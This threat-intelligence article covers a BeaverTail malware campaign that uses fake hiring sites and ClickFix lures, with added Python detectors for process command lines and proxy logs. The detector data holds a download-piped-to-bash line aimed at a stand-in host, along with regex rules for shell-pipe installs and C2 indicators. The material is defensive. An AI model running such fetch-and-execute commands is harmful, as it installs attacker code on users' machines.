
Malicious repositories exploiting BeaverTail variant found to infiltrate organizations within the retail sector.

North Korean threat actors are distributing an extended BeaverTail variant through fraudulent job listings on a fake hiring platform combined with ClickFix social engineering, targeting cryptocurrency traders, marketers and retail employees.


A North Korean state-sponsored group tracked as APT37 (also known as Reaper or ScarCruft) has been distributing an extended variant of the BeaverTail malware since May 2025. The distribution infrastructure is centred on a fraudulent hiring website at businesshire_.top (written defanged here), which masquerades as a legitimate recruitment platform.

The group's tradecraft combines a fake job board with ClickFix social engineering. The malware has been compiled into standalone executables so that it runs on machines without a development runtime such as Node.js or Python, which is what it finds on the non-technical users it now targets.

On Linux, the ClickFix script first installs Node.js via the nvm-sh installer, then downloads and executes a JavaScript build of BeaverTail. On macOS, the ClickFix command starts by downloading a seemingly legitimate installer package named com.nvidiahpc.pkg. On Windows, the ClickFix command downloads an archive with several components, including a renamed 7-Zip executable and a Visual Basic Script launcher.
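The three ClickFix chains above each leave a recognisable process command line on the endpoint. The following detector is an added example written for this page, not code from the GitLab report or from the malware: it applies per-OS heuristics (a download piped into a shell, the nvm installer fetch, a .pkg run from a temp directory, a .vbs launched from Temp, and 7-Zip extract syntax coming from a binary that is not named 7z) to constructed process-creation events. The rule patterns, sample hostnames and paths are this example's own assumptions; com.nvidiahpc.pkg is the package name the article gives.

```python
import re
import shlex
from dataclasses import dataclass

# Heuristic rules for the ClickFix delivery chains described above. Each rule
# is (name, compiled regex) applied to a process command line; the OS tag
# selects the rule set. These are this example's own heuristics, not
# signatures from the GitLab report.
PIPE_TO_SHELL = ("curl-or-wget-piped-to-shell",
                 re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"))

RULES = {
    "linux": [
        PIPE_TO_SHELL,
        # the nvm-sh installer is fetched before the JavaScript BeaverTail stage
        ("nvm-installer-fetch", re.compile(r"nvm-sh/nvm/\S*install\.sh")),
    ],
    "macos": [
        PIPE_TO_SHELL,
        # a .pkg run through the command-line installer from a temp/download dir
        ("silent-pkg-install-from-temp",
         re.compile(r"\binstaller\b.*-pkg\s+\S*(/tmp/|/Downloads/|\$TMPDIR)\S*\.pkg\b")),
    ],
    "windows": [
        # a .vbs launcher executed out of a Temp directory
        ("wscript-from-temp",
         re.compile(r"\b[wc]script(\.exe)?\b.*\\temp\\.*\.vbs\b", re.IGNORECASE)),
    ],
}


def looks_like_renamed_7zip(cmd: str) -> bool:
    """True when a command uses 7-Zip's extract syntax (x|e <archive> -o<dir>)
    but the executable is not named 7z*.exe, i.e. a renamed 7-Zip binary."""
    try:
        toks = shlex.split(cmd, posix=False)   # keep Windows backslashes literal
    except ValueError:
        return False
    if len(toks) < 3 or toks[1].lower() not in ("x", "e"):
        return False
    exe = toks[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()
    has_outdir = any(t.lower().startswith("-o") for t in toks[2:])
    return has_outdir and not exe.startswith("7z")


def scan(os_tag: str, cmd: str) -> list[str]:
    """Return the names of every rule the command line triggers."""
    hits = [name for name, rx in RULES.get(os_tag, []) if rx.search(cmd)]
    if os_tag == "windows" and looks_like_renamed_7zip(cmd):
        hits.append("7zip-syntax-from-unexpected-binary")
    return hits


@dataclass
class Finding:
    os_tag: str
    command: str
    rules: list[str]


def scan_events(events):
    """events: iterable of (os_tag, command_line); returns only the hits."""
    out = []
    for os_tag, cmd in events:
        rules = scan(os_tag, cmd)
        if rules:
            out.append(Finding(os_tag, cmd, rules))
    return out


# Constructed process-creation events (hostnames, user names and paths are invented).
SAMPLE_EVENTS = [
    ("linux", 'bash -c "curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.3/install.sh | bash"'),
    ("linux", "apt-get install -y nodejs"),
    ("macos", "curl -fsSL http://jobs-portal.invalid/fix.sh | bash"),
    ("macos", "installer -pkg /tmp/com.nvidiahpc.pkg -target /"),
    ("windows", r"C:\Users\jdoe\AppData\Local\Temp\nvdrv.exe x C:\Users\jdoe\AppData\Local\Temp\upd.zip -oC:\Users\jdoe\AppData\Local\Temp\nv -y"),
    ("windows", r'"C:\Program Files\7-Zip\7z.exe" x backup.7z -oD:\restore'),
    ("windows", r"wscript.exe C:\Users\jdoe\AppData\Local\Temp\nv\launch.vbs"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.os_tag}] {', '.join(f.rules)}: {f.command}")
```

The renamed-7-Zip rule deliberately keys on argument syntax rather than the file name, because the file name is exactly what the operator changed; in a real deployment you would corroborate it with the binary's original-filename PE metadata. A legitimate 7z.exe in its install path is left alone.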

Although it is packaged to run without a development runtime, the variant's credential-theft logic is narrower than earlier builds: on every platform it targets only eight browser extensions and omits dedicated data-extraction routines for browsers other than Chrome. The campaign targets marketing professionals, cryptocurrency traders and retail sector personnel, a shift away from BeaverTail's traditional software-developer victims.

The site advertises cryptocurrency trader roles at four web3 organisations and sales or marketing roles at three web3 companies and a US-based e-commerce retailer. During the fake application process, candidates hit fabricated technical errors and are told to run system commands as a troubleshooting step; those commands are the ClickFix stage that starts the infection.

GitLab analysts identified the malware through infrastructure analysis and found that the threat actor's backend service remained active at the time of publication. Command-and-control traffic goes to 172.86.93_.139 (written defanged here), with the string 'tttttt' used as the campaign identifier across all infected systems.

Infection attempts that present the expected numeric header value (for example '203') are served the real BeaverTail payload; requests without it receive archives containing only benign Visual Basic scripts and legitimate, signed Nvidia Broadcast executables. The macOS chain also carries a fallback: it executes the compiled InvisibleFerret binary only when Python 3 is unavailable on the host.

The operators built evasion into the infrastructure itself. The malicious service checks the User-Agent header and returns legitimate decoy files to any client that does not present the expected numeric value, so a sandbox or analyst fetching the URL directly sees only benign content.
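Two consequences follow for defenders: a hash or sandbox verdict obtained by fetching the URL without that header describes the decoy, not the malware, and a bare number in the User-Agent field is itself an anomaly worth alerting on. The snippet below is an added example for this page, not code from the report or the actor's backend. It models the gating as the article describes it (a digits-only User-Agent is the assumption made here for "numeric header") and runs three indicator checks (the C2 address the article names, a numeric-only User-Agent, and the 'tttttt' campaign identifier) over a constructed CSV proxy log whose timestamps, internal addresses, URL paths and scanner User-Agent are invented.

```python
import csv
import io
from dataclasses import dataclass, field

# Indicators quoted in the article (the IP is printed defanged there).
C2_IP = "172.86.93.139"
CAMPAIGN_ID = "tttttt"


def server_gate(user_agent: str) -> str:
    """Model of the backend's gating as the article describes it: only a
    request whose User-Agent is a bare number such as '203' gets the real
    payload; anything else is served the benign decoy archive. The exact
    rule (digits only) is an assumption made for this example."""
    return "payload" if user_agent.strip().isdigit() else "decoy"


@dataclass
class Hit:
    line: int
    src: str
    dst: str
    reasons: list = field(default_factory=list)


def detect_proxy_log(text: str) -> list:
    """Scan a CSV proxy log (columns: ts,src,dst,method,url,user_agent) and
    return one Hit per row that talks to the C2, carries a numeric-only
    User-Agent, or embeds the campaign identifier in the URL."""
    hits = []
    for n, row in enumerate(csv.DictReader(io.StringIO(text)), start=1):
        reasons = []
        if row["dst"] == C2_IP:
            reasons.append("dst-is-known-c2")
        if row["user_agent"].strip().isdigit():
            reasons.append("numeric-only-user-agent")
        if CAMPAIGN_ID in row["url"]:
            reasons.append("campaign-id-in-url")
        if reasons:
            hits.append(Hit(n, row["src"], row["dst"], reasons))
    return hits


# Constructed proxy log; timestamps, internal addresses, paths and the
# scanner User-Agent are invented for this example.
SAMPLE_PROXY_LOG = """\
ts,src,dst,method,url,user_agent
2025-06-02T09:14:01Z,10.0.4.21,172.86.93.139,GET,/update/pkg,203
2025-06-02T09:14:07Z,10.0.4.21,172.86.93.139,POST,/upload?cid=tttttt,203
2025-06-02T09:15:30Z,10.0.9.8,172.86.93.139,GET,/update/pkg,Mozilla/5.0 (compatible; UrlScanner/1.0)
2025-06-02T09:16:02Z,10.0.4.33,203.0.113.5,GET,/index.html,Mozilla/5.0 (Macintosh)
"""

if __name__ == "__main__":
    for h in detect_proxy_log(SAMPLE_PROXY_LOG):
        print(f"line {h.line}: {h.src} -> {h.dst}: {', '.join(h.reasons)}")
    # The scanner on line 3 fetched the same path as the victim but without
    # the numeric header, so the server would have handed it the decoy:
    print("scanner got:", server_gate("Mozilla/5.0 (compatible; UrlScanner/1.0)"))
```

Line 3 of the sample is the instructive case: the destination matches the C2, yet the User-Agent is a normal browser string, so whatever that fetch retrieved was the signed Nvidia decoy rather than BeaverTail. Block on the destination and the numeric User-Agent, not on the hash of what your scanner downloaded.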

On Linux, the malicious script is fetched with a single download command and piped straight into bash. On macOS, the chain proceeds through execution of the downloaded com.nvidiahpc.pkg, which retrieves two unsigned Mach-O binaries. A script inside the package also attempts to exfiltrate stored passwords from a non-standard file location.

GitLab analysts have been tracking this campaign closely and have identified the command-and-control server hosting the malware. They advise users to be vigilant when applying for jobs online and to ensure their systems are protected with up-to-date antivirus software. In practice the clearest tell is the process itself: no legitimate application portal asks a candidate to paste a command into a terminal or run an installer to fix a page error.
